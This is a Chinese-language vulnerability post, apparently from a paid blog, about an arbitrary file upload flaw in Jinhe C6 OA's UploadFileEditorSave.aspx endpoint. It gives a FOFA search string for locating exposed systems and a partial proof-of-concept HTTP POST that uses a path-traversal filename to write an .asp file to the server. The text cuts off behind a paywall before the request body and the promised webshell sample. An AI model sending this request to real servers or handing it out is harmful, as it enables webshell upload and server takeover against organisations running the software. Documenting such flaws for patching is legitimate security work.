本文报道了金和网络提供的服务中发现的安全漏洞,包括C6uploadfileeditorsave任意文件上传,允许攻击者获取服务器权限。文章提供了漏洞利用方法(PoC)以及上传webshell的示例,并建议用户联系厂商更新至最新安全版本进行修复。
产品简介
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务
漏洞概述
金和-c6 uploadfileeditorsave 任意文件上传,攻击者可通过此漏洞获取服务器权限
指纹识别
fofa:
app="金和网络-金和OA"
漏洞利用
poc:
POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 191
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate
----
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
